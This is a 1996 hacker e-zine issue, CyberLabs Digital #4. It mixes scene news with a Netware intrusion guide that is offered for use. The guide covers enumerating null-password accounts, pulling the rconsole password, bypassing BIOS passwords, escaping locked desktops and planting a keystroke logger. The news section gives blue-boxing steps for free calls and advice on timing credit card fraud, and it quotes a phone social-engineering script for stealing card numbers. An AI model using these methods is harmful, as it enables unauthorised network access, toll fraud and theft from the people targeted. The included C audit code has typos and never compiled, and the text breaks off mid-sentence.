-= Issue #4 14/8/96 =- THE PROFESSIONAL EDITION ._---°--------------------------------------------------------°-_. | [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-cREW-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] | | BlackHaze EDiTOR | | Diceman C0-EDiTOR | | MR MiLK NEWS | | R|[o[HeT DiGiTaL k0URiER | | LSD CHa0S C0DER/WRiTER | | [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å--WRiTERS-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] | | | | Myst | | aCiD XTReMe | | MiNDWaRP | | JET BLACK | | PAiN_HZ | | | | [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-C0NTACT-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] | | SUBSCRiPTiONS: bend@st.nepean.uws.edu.au | | SUGGESTiONS/SUBMiTTING ARTiCLES: bhaze@fl.net.au | | diceman@fl.net.au | | [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] | | KN0WLEDGE iS N0T A CRiME | '----° CyberLabs Digital °---------------------------------------' .____________________________________________________________________________. -= Preface Welcome To CyberLabs Digital issue #4. Alot has undergone since previous issues of CLD, we have gathered up new crew & now have a permanent home on #security on OzNet. Not only have we strived to bring you with quality HP articles this issue, but we are trying desperately to unite the HP scene within Australia as we feel that time has come. As you have already noticed, one major change is the removal of the reader. And yes is was cruddy, so from now on CLD will be sent out in ascii. Before I forget to mention, diceman has taken over as co-editor! In the covers of this issue, we have included a k-rad codez ;>, a netware security article, a phreaking article on phreak, a story on the life, an article on scanning, and finally a Java segment, amongst others. An almighty thanks to all who contributed. Blah, enough said let issue 4 begin! BlackHaze & Diceman .____________________________________________________________________________. -= C0NENTS 1. Subscribe ........................................... 2. Disclamier .......................................... 3. Unite The Scene ..................................... 4. CLD News & Views .................................... 5. Elite Speak ......................................... 6. Netware 3.1x/4.x Uebercracker Tips and Resources .... 7. Perl Exploit ........................................ 8. Scanning Made Easy .................................. 9. OzPhreakin' ......................................... 10. #SECURiTY lame & weird quotes ....................... <#security> 11. The Basics of Sniffing .............................. 12. Getting Trashed By The Cops ......................... < ANON ;) > 13. Java Security - Does Suns new language promise security risks on the Internet ...................... 14. neXt iSSUE .......................................... .____________________________________________________________________________. -= SUBSCRiBE =- If you would like to subscribe to CyberLabs Digital Inc. Just follow these instructions: 1. Send an email to "bend@st.nepean.uws.edu.au". 2. Leave the "Subject:" field of the email 'CyberLabs Subscription' 3. The first line of your email should read: SUBSCRIBE CYBERLABS DIGITAL .________. _____________________________________ ._____... | G R E E | Z | | =- Mr Milk, Diceman, Nemesis, NiCkY, VOiD, Shaman -= | =- Frog, Myst, Freedom, Stux, aCidx, Tusker, TWiliGHT -= | =- Fusion, Data King & all the #security ppl on OzNet -= '______________________________________________________________.. -= DiSCLAMiER Blah. - CLD Staff -= Unite The Scene -= By: CLD Staff What was the last Australian hacking or phreaking home page you visited ? The chances are that over 90%+ of information resources that you use as a hacker or phreaker will have come from the US. We constantly hear the question "I have read all the US phreaking articles, does it work here ?". At one point in life everyone is a newbie, information does not need to be handed on a silver platter, but as it stands there is little Australian related information available. fourtannly there still stands many HP related boards in Oz, few carry a substantial amount of information & the ones which do you must have access. Have you noted that there appears to be no Australian HP scene ? The scene has always been there, only thing you had to look hard. Recent events such as movies like 'HACKERS' have spawned newbies in their hundreds into the scene. Media hype also plays an important role into how the scene is influenced peoples interested. As many of us can see, the more active the scene is the better! With the HP scene slowly on an increase, so to is the rapid growth of the warez scene. This is a pity to see & many of the k0uriez do nothing to contribute to the HP scene, other than leech commercial software thinking they are elite & carry huge egos'. CLD does not hold anything against the mass of warez groups within Oz, we would just like to see them somewhat aid in lifting the HP scene off the ground for good. Whether you have been at it for years or are just starting, everyone needs information sources. We at CLD will strive to bring an important part of this to you. CLD is not only about H/P, it is about researching topics and building knowledge. We implore you to write your experience's down or part with some of your knowledge, so that we will inturn achieve a greater technical level within our articles. The end result of this can only be more knowledge. CLD has moved through three issues. As each issue passes, the technical content has improved significantly. It can be see that CLD is growing in many ways and we the editors hope that the readers will also grow with us. Now is the time for people to share their ideas, to grow with each other. The time is near for the HP scene to unite, we will be there aiding the scene & hope you will join us in the long road ahead... Cheers, BlackHaze & Diceman Editor/Co-Editor .____________________________________________________________________________. -= CLD NEWS & ViEWS -= By: Souprd00d aka Mr_Milk & the CLD crew Alrighty then... I guess this is really the first news section that will actually occupy more than a couple of lines. I decided that CLD needed a decent section to cover little tidbits and other stuff like that. Hopefully it will turn out ok. If you have any recent news relating to Aus HPA then mail it to me at edjjs@alinga.newcastle.edu.au, and I will make sure it gets printed here. ****/ KUA stamps Authority on AUS scene \*** (NOT!) A couple of underground boards started cropping up as KUA distro's. KUA are a supposed HPA group with the members Mr Hacker, HandS and Gothik. Sound interesting?.... a HPA group in Australia too good to be true? yeah probably . After checking out some of there releases with some of the #security guys I found myself laughing as I had never laughed before. The topics were covered in a couple lines and everything was so vague and in descriptive (My cat is a more elite hacker then you). Dont believe me? ok I will include a golden example of what KUA is and about. ----------------------------------begin KUA Gold---------------------------- How To Get VALID Credit Cards In OZ =================================== Ever wonded how people got all the VALID credit card numbers from? Ok read on! first ya get your white pages (or fonedisk) out and find a target :) ring up the guy, and tell him/her ya r calling from Telstra and the billing computer had crashed so all the info is lost, then ask him/her wat method they used 2 pay for the fone bill last time, if they said Credit card then say "Can I have the number and the expire date again please" they will normally give it 2 ya.. so here ya go just got ya self a card.. umm thats it.. be careful and *** DO NOT *** spread this file 2 any public or little lame board, I dont want some little lamers 2 know this!! How To Rip Off A Slot Machine ============================= theres a button at the back of poker machines which you press and it gives you a jackpot (usually red or black) i presume its there to get all the money out of the machine. -Gothik & Mr Hacker- KUA'96 ----------------------------------end KUA Gold--------------------------------- [ed note: wow, KUA is thriving from such intelligence. NOT! Why not send KUA a friendly little email... heheh, we know we will :) wup@ozemail.com.au] Ok that was the ever popular credit card number/Slot Machine article as you can see it is streaming with depth and creativeness. If you think I am flaming KUA as a group then you are mistaken. Australia needs hacking groups but you need to ask yourself do we need groups like KUA with obvious minimal ability? Well anyway whilst they are around I WILL continue to read there stuff not because I will learn but because I will laugh everytime they write another article... WAREZ anyone? :> -- Western Australian Reporter: Peter Morris AUSTRALIA'S 2.7 million analogue mobile phone users risk having their accounts electronically stolen and bills in their names rung up for thousands of dollars, according to two perth men. According to Telstra, the pair ran up a bill of more than $15,000 on an Adelaide man's mobile phone over a six week period. Telstra has described it as Australia's worst case of phone fraud. The pair, Bob and Richard ( not their real names ) aged 20 and 19, say they hacked into the mobile phone analogue network - a process known as phreaking - "to prove how insecure the network is". They "stole" the electronic signature from Adelaide signwriter Murray Goodes' phone by modifying their own analogue phone to scan the network and catch the electronic serial numbers (ESN) on to a computer as they were broadcast. Using an old analogue phone and computer, together with freely available software, the ESN was then programmed into the phone to enable it to access the network masquerading as Mr Goodes' phone. Bob and Richard say they were motivated by anger at Telstra's constant assurances that the analogue network was secure. "We were interested in how long it would talk for Telstra to track us down. If we wanted to avoid getting caught, it would have been very easy to cover out tracks," Richard said. The analogue system is the older of the two cellular phone networks operating in Australia. The Federal Government has announced it will be closed by the end of the century. Mobile subscribers are being encouraged to use the newer and more secure digital network. Suppliers say demand for analogue mobile phones has slowed dramatically this year. Telstra spoakswoman Lesley Tannerhill said consumers should be aware that the potential for phreaking was limited to the analogue network and the company was able to detect it. She said customers whose phones were misused would not be liable for the bill. Bob and Richard said thay chose to steal a number from an Adelaide based subscriber so it was clear to Telstra that Mr Goodes was not responsible for the calls and so would not be forced to pay the bill. Mr Goodes said he has been assured by Telstra that he would not be held liable for the $5333 bill he received, more than $5000 over his normal monthly account. As a sole proprietor he said he was dependent on the mobile phone for work and there had been a noticeable drop-off in business last month - he estimated a 60 per cent fall. "I dont think they understand the damage they can do to people's business," Mr Goodes said. Bob and Richard used the phone freely for six weeks before being raided by the Australian Federal Police about two weeks ago. No charges have been laied. They used the phone about 18 hours a day, mostly calling overseas including sex chat lines in Israel. Easy picking for security experts --------------------------------- TO THE casual observer, Bob and Richard look like a couple of successful 20-somethings: well-dressed and easily able to supplement their bachelor eating habits with regular splashes at expensive restaurants. The outward appearance accurately reflects their professional lives as computer security consultants whose skills are so highly sought-after they have the potential to earn well over $100,000 a year. "We work pretty much how and when we want," Richard said. Both started university but left in the first year when they found the learning experience on campus too slow. They see phreaking (getting free use of telephones) and hacking into computer systems as inextricably linked. Having developed a childhood fascination with the technology, they now see hacking as the fastest way to keep updating their skills. And while there may be a great deal of scepticism among computer system operators about their motivation, Nick Chantler, an army counter-intelligence instructor who has completed a major study of hackers, said this thirst to learn more about systems was common. "The vast majority of them are not evil, they just want to increase their knowledge," he said. But he said sometimes this enthusiasm could overwhelm their ethical constraints. After years researching hackers, Dr Chantler has enormous respect for the knowledge and ability elite hackers have, something he believes many big organizations are completely blind to. "There is nothing they can't do if they set their minds to it," he said. "The elite hackers could bring Australia to its knees." He said that throwing the book at phreakers and hackers was not the answer because of the damage they could wreak. "What I would be doing with these guys is to quietly pull them aside and try to learn as much as I could about what they know," Dr Chantler said. Pipe Bomb explodes in boys hand ------------------------------- I was watching WIN television one night while on IRC, why the hell i was watching WIN i don't know! And as usual the 10:45 news appears, and low and behold Pipe bomb explodes in boys hand... Stunned, i turned around & watched the news and to my utter amazement i was shocked at how lame this teenager was... using a hammer with a pipe bomb? wow, that just proves his vast intelligence HA. Not only did the media over hype this story they also had to relate it to the bomb blast in Atlanta. Now as usual the media needed a ground-breaking story, so of course what do they do is The internet is to be blamed, as files on illegal bomb construction can be found. By this stage I was furious, i felt like physically driving down to the scene & lob a few hundred pipe bombs outa my cars window, while yelling 'This is how you make a pipe bomb lamer!' whilst several WIN camera men are sent flying throw the air. I guess that some looser of a politician will bring the matter up in parliament it will be a great surprise if any action will be actually taken, besides they can't do a simple thing. Well let's hope not. Anyhow, we find that constructing pipe bombs one of the most dumbest things, & always the lamers are the ones who find themselves fuqd' up in the end. Along with all the try-hard Anarchist groups within Oz & lamers bragging about how damm gewd they are at constructing explosives, there's no hope :) 049 gets busted, well almost! ----------------------------- During last month ( maybe this month too) Federal Police were in Newcastle to help local ISP's (hunterlink) and national Point-Of-Presense's (ozemail access1 etc.) riddle out credit card fraud. Obviously with the easiness of fake accounting something would need to be done to weed them out. No arrests have been made yet involving credit card fraud on the ISP but I guess it will only be time before some WaReZ kiddie goes down. So just a warning anyone using Newcastle ISP's or even anyone in NSW lay off the credit cards for a while at least as the beer gut bad boys are in town. One person has been arrested already regarding ordering $1000 of goods from a local store from a fake credit card that he got from the Internet. This is what initially started the interest in credit card fraud.. I am sure the Fedz will be looking for more heads so dont let it be you. Sticking with credit card fraud there are enormous rumors that Ozemail have the Fedz helping them catch kiddies using fake cc#'s. So again lay off with the fraud for a while. Boards springing up over the country ------------------------------------ A large number of HPA related BBS's are starting to crop up. Although alot only have a minimal filebase and no decent msg areas going it is good to see that an underground is starting to form. If you are a sysop of a HPA related BBS, keep going and keep putting in an effort to make your bbs elite. The Blue Box Myth ----------------- I am sick and tired of hearing on irc that Blue Boxing in Australia is dead. Sure most of Australian telephone switching system is already converted to digital and it is impossible to blue box within Australia. HOWEVER the way to successfully blue box in Australia is too first call another country that has a shithouse phone system and bad connection to Australia. You call another country using the 1800 country direct numbers (1800 881 ***) these will connect you to another country's fone exchange for FREE. Alright most are robotised and allow you to make calls using a calling card or some even a credit card you can bail out now and just use your fake cc #'s etc to dial back into Australia for free calls. However if you dont want to get caught easily you can blue box your way back into Australia. To do this you will need a tone generator, scavenger is a good start.. or even BlueBeep will do. Ok set up a simple two tone sound of 2400+2600 and then 2400... I will leave the timing and volume up to you... but after you hear a chirp when dialing the country direct number you send the seize tones down.. you should hear the tones played back to you... if this is the case you have a successful seize and all you have to do is usually dial KP2+country code+0 + number + ST and it will work. If it hangs up on you when you play the tone, it means that the timing is too long and you should adust it. Also volume is important so tweak away with it as well. So it is possible to blue box within australia you just have to use a cheap country like Aruba to help you on your way. SUMMARY:dial country direct to distant country. seize line dial back in Australia Hacking in Australia -------------------- There are many 1800 numbers that be scanned with a program such as ToneLoc or TheScan. Good exchanges to start on are the 1800 801 *** and 1800 124 ***. These have many carriers and can be a good starting point. These are all Carriers and contain some decent computers. Have a look and see them for yourself... hey they arent costing you anything. CONCLUSION: Ok that wraps up my first attempt at a news article... so hope you liked it etc. and I will catcha in the next issue. Remember the Aus HPA scene needs you to grow! .__________________________________________________________________________. Elite Speak should compile under any unix platform or PC. You will have to call ExitToShell() rather than exit() to compile under SIOUX ansi c. /* Elite Speak Author: CLD Crew - bhaze@fl.net.au Date: 8/13/96 Version: 1.1 Usage: > type the required text here >> +Yp3 +h3 R3qu1r3d +3x+ h3R3 */ #include int upper(char pass) { if((pass <= 89) && (pass >= 66)) return 1; else return 0; } int lower(char pass) { if((pass <= 122) && (pass >= 97)) return 1; else return 0; } void main(void) { int ChangeToUpper = -32, ChangeToLower = 32; int HE = 69, HO = 79, HI = 73, HS = 115, HT = 116; int H1 = 49, H3 = 51, H0 = 48, H5 = 53, Ht = 43; char buffa[100]; int NumOfChars = 0,count = 0,scuz = 0; printf("\n"); printf("3L1+3 5p3Ak V3r510n 1.1 - By th3 CLD cr3w bhaze@fl.net.au \n \n"); printf("> "); do { buffa[NumOfChars] = getchar(); NumOfChars++; } while((NumOfChars < 100) && (buffa[(NumOfChars - 1)] >= 32)); NumOfChars--; printf("\n"); printf(">> "); while(count < NumOfChars) { if((buffa[count] == HE) || (buffa[count] == (HE + ChangeToLower))) { buffa[count] = H3; } if((buffa[count] == HO) || (buffa[count] == (HO + ChangeToLower))) { buffa[count] = H0; } if((buffa[count] == HI) || (buffa[count] == (HI + ChangeToLower))) { buffa[count] = H1; } if((buffa[count] == HT) || (buffa[count] == (HI + ChangeToLower))) { buffa[count] = Ht; } if((buffa[count] == HS) || (buffa[count] == (HI + ChangeToLower))) { buffa[count] = H5; } if ((scuz == 1) && (upper(buffa[count]))) { buffa[count] = buffa[count] + ChangeToLower; } else if ((scuz == 1) && (lower(buffa[count]))) { buffa[count] = buffa[count] + ChangeToUpper; } if (scuz < 3) {scuz ++;} else scuz = 0; printf("%c",buffa[count]); count++; } printf("\n"); getchar(); exit(0); //ExitToShell <--- Use for SIOUX ANSI C. } .____________________________________________________________________________. Diceman's Netware 3.1x and 4.x Uebercracker Tips and Resources ============================================================== by diceman@fl.net.au CONTENTS ======== Getting a feel for the Network Netware Three Netware Four How a Uebercracker gets Supervisor rights How a Uebercracker keeps his rights Where are those error logs and what do they log ? A listing of utilities to penetrate Novell Netware - some of the things that are possible. ============================================================================== This was written at the beginning of 1995, as a reference guide for myself. Since then it has not been updated, due to the fact that i have moved to unix. Despite this, to all the die hard unix hackers the fact is that 88% of the top 1000 fortune companies use novell netware, that counts for something ;>. I have tried to include original information, which has succeeded to a degree. The introduction to netware security, is i believe to be a first. Also this file contains no specific version 4 hacking, thus its usefulness maybe limited. Note that it is still an excellent reference for people new to netware. Obviously, information has been taken from sources, credit has been intended to be given. A special note for the Netware Hacking FAQ by Simple Nomad is in order. ============================================================================== Getting a feel for the Network ============================== 1. NETWARE THREE ================ How many servers are there ? ---------------------------- It is always good to know how many servers there are on the network you are on. The simple command "slist" will perform this, you do not need to be logged in. The file should usually be held at sys:login\slist.exe. Notice in the status column that servers can be default and attached, if you are logged into the network. Here is the output : Known NetWare File Servers Network Node Address Status -------------------------- ------- ------------ ------ ECHIDNA [ A0001][ 1]Attached HAKEA [ FACA][ 1] MELAB [ BAD1E][ 1] MEOFF [ D1ED][ 1] MOFF [ 2][ 4] MOTHER [ FADED0][ 1] NURSING_1 [ 256][ 1]Default PDU [ 30A][ 1] PRFMIS [ BEAD1][ 1] RECORDS [ ABBA][ 1] SERVER1 [ 1B0000][ 1] [Snip] Total of 35 file servers found The Login Script ---------------- This file the "login script" is processed by everyone who logs into the network as apposed to attaching. It is held at sys:\public\net$log.dat. This file is in clear text, and if you have the rights, can be edited. The file often shows batch files that will be processed by certain users. It is good to review these files to see how the network is managed and what programs are loaded. Notice the "exit" at the end of the file. If this command is not issued, then individuals can utilised personal login scripts. Here is an example (my creation ;>): pccompatible map display off rem --------------------------------------------------------------------- rem User drive mappings map errors off if member of "lockout" then exit "lockout" if login_name is "supervisor" then begin map r j:=sys:user\other else map r j:=sys:user\%login_name end map errors on rem --------------------------------------------------------------------- rem Other mappings map f:=sys:default map r m:=sys:data map r INS s1:=sys:public map r INS s2:=sys:programs\%smachine\%os_version map r INS s3:=sys:std comspec=s2:command.com rem -------------------------------------------------------------------- rem Special logins if login_name is "PRINTER" then exit "prn-user" if login_name="FAXHQ" then exit "faxhq" if login_name="ANYWHERE" then exit "pcany" if login_name="backup" then exit "emerald" if login_name="asc" then exit "command /c asc" rem --------------------------------------------------------------------- rem Start screen displays write write "Good ";greeting_time;", ";full_name;"." write "It's ";day_of_week;", ";day;" ";month_name;", ";year;", and the time is ";hour;":";minute;" ";am_pm;"." write "You are now logged on at station ";station;"." write set prompt = "$P$G" set name = "%LOGIN_NAME" set wp51name = "%FULL_NAME" if member of "BTSG" then set BTS = "G1" rem ------------------------------------------------------------------------- rem Set printer capturing #capture l=1 q=printq_0 nt nb nff ti10 #capture l=2 q=printq_1 nt nb nff ti10 rem --------------------------------------------------------------------- rem Special Group conditions if member of "wbmas" then map q:=sys:wbmas if member of "audit" then map k:=sys:audit if member of "it" then exit "it" exit "mlk" The autoexec.ncf ---------------- The autoexec.ncf is one of the two startup files for the netware server the other being startup.ncf. Here is one of my creations: rem ----------------------------------------------------------------------- file server name hack ipx internal net B00B rem ----------------------------------------------------------------------- REM BINDING IPX TO THE ETHERNET BOARD rem load ethertsm load ne1000 port=300 int=3 frame=Ethernet_II name=hacknet bind ipx hacknet net=1 rem ----------------------------------------------------------------------- REM BINDING TCPIP TO THE ETHERNET BOARD load snmp load tcpip rip=no bind ip hacknet ad=129.1.0.3 ma=255.255.255.0 rem ----------------------------------------------------------------------- REM LOADING DISK DRIVERS load isadisk port=1F0 int=E rem ----------------------------------------------------------------------- REM MOUNTING ALL HARD DRIVES mount all rem ----------------------------------------------------------------------- REM LOAD A FEW LOGS - AFTER CLIB HAS BEEN AUTO LOADED BY TCPIP - AND SYS MOUNTED load c:\server.312\conlog.nlm load c:\server.312\snmplog.nlm rem ----------------------------------------------------------------------- REM SECURITY secure console remove dos set allow unencrypted passwords = off rem ----------------------------------------------------------------------- REM LOADING BASIC NLMS FOR OPERATION search add c:\server.312 rem load streams - AUTO LOADED BY TCPIP rem load clib - AUTO LOADED BY TCPIP load nut load mathlib load tli load ipxs load spxs load remote remote rem the above line sets the remote console (sys:\system\rconsole.exe) passwd load rspx rem load pserver pserver load monitor P NH rem ----------------------------------------------------------------------- REM LOAD ADD ON NLMS search add c:\server.312\nlms load eventmon -l sys:etc\eventmon.log -a load nwshell rem ----------------------------------------------------------------------- This is one of the most important files for the netware server. It could be located in two positions. Either c:\server.312\autoexec.ncf (or similar) or sys:\system\autoexec.ncf. This positioning is very important, due to the fact that to access it on c: is alot harder than sys:. For example, the sys admin has left himself logged in, a simple type sys:\system\autoexec.ncf to retreive the rconsole password, thus all security levels have been breached. The autoexec.ncf tells the netware server what nlms to load upon startup. Note that conlog.nlm is loaded, this is describe below. Also eventmon, this monitors all changes in the file system and the bindery. Who are the users, and what is the structure of the groups ---------------------------------------------------------- By default every new user created on the novell network is added to the group everyone. By entering the program "syscon" held usually at sys:public\syscon.exe, a complete listing of users and groups can be found. An easy way to get all the users and gourps to an ascii text file is through the use of a thirdly party utils. Use the utility grplist.exe to retrieve a listing of groups or a full listing of users. For example the command: grplist {server}\everyone - provides a listing of all users in the group everyone. grplist - provides a listing of all users on a server. Which users do not have passwords --------------------------------- Login as any user. Use the utility "chknull" by itsme, this will return a listing of users with null passwords. 02000002 0001 ANYWHERE HAS a NULL password 04000002 0001 ASC HAS a NULL password 2b000001 0001 MIDBACK HAS a NULL password 36000001 0001 PRINTER HAS a NULL password 3b000002 0001 TEMP HAS a NULL password 3e000001 0007 PSERVER HAS a NULL password The pserver can not be logged into from the login prompt. To see what rights these useid's have "attach {username}" instead of login. Beware is accounting if installed. Are the default accounts still in existance ------------------------------------------- Upon installation Netware 3.1x creates two users: Supervisor Guest What rights do I have --------------------- It is important to see what rights your userid has. The commands "rights, whoami and list" are particularly useful. Rights - by itself tells the user what rights they have in the default directory. FS3\SYS: Your Effective Rights for this directory are [SRWCEMFA] You have Supervisor Rights to Directory. (S) * May Read from File. (R) * May Write to File. (W) May Create Subdirectories and Files. (C) May Erase Directory. (E) May Modify Directory. (M) May Scan for Files. (F) May Change Access Control. (A) * Has no effect on directory. Entries in Directory May Inherit [SRWCEMFA] rights. You have ALL RIGHTS to Directory Entry. Whoami - normally tells the user which login id they are using. Whoami is also useful to: whoami /g - lists the groups you belong to whoami /r - lists your effective rights in the network directory structure. whoami /s - lists your security equivatants. whoami /a - lists the groups, security equivalences, and your effective rights. Tlist- displays the users trustee rights and their effective rights. Listdir /e - displays effective rights of all subdirectories. Ok what do these rights mean The Eight Netware Rights ------------------------ S Supervisory: Once granted to a user or group on a specific directory, this right gives the trustee holding it all rights, as well as the ability to grant all rights to other users or user groups on that directory and its subdirectoriesThe supervisory right itself is automatically propagated for the trustee holding it to all subdirectories below the one where it was granted, and it cannot be revoked for the trustee from subdirectories below the original assignemtn. It also overrides any restricitions put in place by the Netware Inherited Rights Mask.At the file level, it allows a user all rights to the file - and the ability to grant or modify any right to any file for any user or group in any directory at or below the directory where the supervisory rights were assigned. R Read: This right allows a user or group to open a file for reading or to run an excutable program. W Write: Allows a user or group to open and modify a files's contents. C Create: At the directory level, Create allows a user or group to make subdirectories and files within them. If this right is the only one granted at the directory level, it allows the trustee holding it to create subdirectories and files. But once a file is closed, it cannot be seen using standard DOS or Netware commands( for example DIR or NDIR ). E Erase: Controls whether or not a directory, its subdirectories and the files within the directory and subdirectories can be deleted. M Modify: Users or groups with this right have the ability to set and change file or directory attributes. This includes renaming directories or files within directories. This trustee right has no effect on the ability to modify the contents of a file. F File Scan: Users or groups must have this trustee right to see that directories or files within directories exist. A Access Control: This right allows a user to modify the trustee assignments or the Inherited Rights Mask of a directory or file. It does not allow a user to grant the supervisory trustee right, but it does allow them to grant trustee rights to others that they themmselves do not have. What Rights does it take to ? ----------------------------- Rights for Common File and Directory Tasks Read from a closed file Read See a file name File Scan Search a directory for file File Scan Write to closed file Write, Create, Erase, Modify Execute an EXE file Read, File Scan Create and write to a file Create Copy files from a directory Read, File Scan Make a new directory Create Delete a file Erase Salvage deleted files Read, Write, Create, File Scan and Create at directory level Change directory or file attributes Modify Rename a file or directory Modify Change the Inherited Rights Mask Access Control Change trustee assignments Access Control Modify a directory's disk space Access Control Who is currently logged in -------------------------- The "userlist" command will reveal all. The command "userlist /a" will list the ethernet addresses as well. User Information for Server TEMP Connection User Name Network Node Address Login Time ---------- -------------- -------- ------------ ------------------- 1 SUPERVISOR [ 2] [ 80C7BD547A] 2-12-1997 1:59 pm 2 GUEST [ 2] [ 20E00EB486] 2-12-1997 10:26 am 3 FAXHQ [ 2] [ C06D7C4E] 2-08-1997 3:08 pm [Snip] 42 PRINTER [ 2] [ C0707C4E] 2-12-1997 1:28 pm 43 BACKUP [ 2] [ 20E00E9B70] 2-12-1997 3:02 pm 44 TEMP [ 2] [ 20E00E3F33] 2-12-1997 2:06 pm The utility getequiv.exe checks, a single user, all members of a group, all users on a server, and lists all users, who have security equivalences to a user or group. Is Accounting Install --------------------- To tell if accounting is installed as any user, load "syscon". Hit return on "Accounting" and if you get the "Accounting Not Installed", or "Do you wish to install accounting", then accounting is not installed. Note that all accounting records are held at sys:\system\net$acct.dat. Access to this directory is for only privilaged accounts. Has TCP/IP been installed on the network ---------------------------------------- The in the sys:etc directory there are several files relating to other systems that could be connected on the same ethernet. All can be edited with a standard text editor, if you have sufficient rights, or using the edit NLM from the console. Note lines with a comment (#) anywhere one the line are ignored. SYS:ETC\HOSTS: - maps host names to IP addresses. It's format is identical to /etc/hosts on UNIX systems. A Hosts file entry has the following format: IP_address, Host_name, [alias [..]]. #Mappings of host names and host aliases to IP address. # 130.57.4.2ta tahiti ta.novell.com loghost 130.57.6.40osd-frog frog SYS:ETC\NETWORKS: - maps network names to network addresses. A Networks file has the following format: network_name, network_number, [alias [ ...]] #Network numbers # loopback127# fictitious internal loopback network novellnet130.57# Novell's network number SYS:ETC\PROTOCOL: - maps protocol names to IP protocol numbers. The Protocol file contains information about the known protocols used on the DARPA Internet network. A Protocol file has the following format : protocol_name, protocol_number, [alias [..]]. #Internet (IP) protocols # ip0IP# internet protocol, pseudo protocol number icmp1ICMP# internet control message protocol tcp6TCP# transmission control protocol udp17UDP# user datagram protocol SYS:ETC\SERVICES: - maps service names to transport protocol/well-known port pairs. # Network service mappings. Maps service names to transport # protocol and transport protocol ports. # ftp 21/tcp telnet 23/tcp smtp 25/tcp mail # # Host specific functions # tftp 69/udp finger 79/tcp link 87/tcp ttylink # # UNIX specific services these are NOT officially assigned # exec 512/tcp login 513/tcp shell 514/tcp cmd # no passwords used printer 515/tcp spooler # experimental 2. NETWARE FOUR =============== I do not have a netware four right here a the moment, so here is a listing of commands that will be helpful but no outputs. nlist server /b - Will provide a list of the bindery servers on your network an information about the servers. nlist server - provides a list of servers within the current NDS context. nlist volume - views the file server volumes defined within the current NDS context. nlist /vol - gives more detailed info on the detailed volume. ndir [path] /do /sub - shows information about the directories in the default directory. ndir [path] /a - used to view information about each file in the default directory. ndir [path] /r - view information about each file and directory in the default directory. Shows more detailed info. nlist user /a - a list of users logged into the current NDS context. nlist user /b=[server name] - views a list of users defined to the specified server. This is a recommeneded command. rights [path] /t - used to view the trustee list of a file or directory in the default or pathed directory. nlist group - view groups within the current NDS context. nlist organization show "login script" - view the login scripts of organizations within the current NDS context. cx /t /all - used to view the NDS tree within the current NDS context. nlist organization show "detect intruder" - show the detect intruder settings for the organizations with the current NDS context. nlist group show "member" - view the groups defined within the current NDS context and the members of each group. Is auditing installed --------------------- There has been a new feature installed with netware 4, the ability for an auditor to independently supervise the network. Here is a "c" file that, should show if auditing has been installed, as any user. I say should due to the fact that i do not have the client api's to compile. If anyone does compile this please send it to me. /* audit.c */ #include #include #include #include void FreeUnicodeTables(); void FreeContext(NWDSContextHandle context); void main(void) { NWContainerAuditStatus dsStatus; MWDSContextHandlw dContext; NWCONN_HANDLE dsconnhandle; NWOBJ_ID containerID; NWCCODE ccode; char nameContext[MAX_DN_CHARS + 1]=""; int countrycode, codepage; countrycode = 001; #ifdef N_PLAT_UNIX codepage = 88591; #else codepage = 437; #endif ccode = NWInitUnicodeTables(countrycode, codepage); if(ccode) { printf("\nNWInitUnicodeTables error\n"); exit(1); } dContext = NWDSCreateContext(); id(dContext == ERR_CONTEXT_CREATION) { printf("\nNWDSCreateContext error %X\n", dContext); FreeUnicodeTables(); } ccode=NWDSGetContext(dContext, DCK_NAME_CONTEXT, nameContext); if(ccode) { printf("\nNWDSGetContext error %X\n", ccode); FreeContext(dContext); } ccode=NWDSAuditGetObjectID(dContext, nameContext, &dsconnhandle, &containerID); if(ccode) { printf("\nNWDSAuditGetObjectID error %X for object %s\n", ccode, nameContext); FreeContext(dContext); } ccode=NWDSGetContainerAuditStats(dsconnhandle, containerID, &dsStatus, sizeof(dsStatus)); if(ccode) { print("\nNWDSGetContainerAuditStatus error %X\n", ccode); FreeContext(dContext); } printf("Audit is %s on %s.\n", (dsStatus.auditingEnableFlag ? "enabled : "disabled"), nameContext); FreeContext(dContext); } void FreeContext(NWDSContextHandle context) { NWDSFreeContext(context); FreeUnicodeTables(); } void FreeUnicodeTables() { NWFreeUnicodeTables(); exit(1); } How a Uebecracker gets Supervisor rights and a few tricks ========================================================= Cracking the bios password -------------------------- Source: alt.2600 faq Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed. The most common BIOS password attack programs are for Ami BIOS. Some password attack programs will return the AMI BIOS password in plain text, some will return it in ASCII codes, some will return it in scan codes. This appears to be dependent not just on the password attacker, but also on the version of Ami BIOS. To obtain Ami BIOS password attackers, ftp to ftp.oak.oakland.edu /simtel/msdos/sysutil/. If you cannot access the machine after if has been powered up, it is still possible to get past the password. The password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted. On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery. Just getting the dos prompt --------------------------- You might be thinking what a dos prompt.... doesn't everyone have one. Senario:Machine is booted in the morning with a bios password, logged into the network and Windows is loaded . But then the ALT+F column is disabled by a security program. There is no dos-prompt icons, and the only program is netscape. The standard windows programs are there other than file manager. The autoexec.bat,config.sys and the network file (called from the autoexec.bat c:\nwclient\startnet) are read-only. Solution:One, load netscape and load the General Preferences section. Change the viewer source to command.com. Next time the view is loaded, say thank you and there is a dos prompt. If Netscape was not available, the next section order of excecution of dos files, becomes useful. Place a com in the same directory as startnet.bat. The com file will excecute before the batch file to load any program you wish before the computer logs into the network. One possibly would be key stroke logger to catch the password. But how place the com in c:\nwclient, there is no dos prompt or file manger. Use write.exe 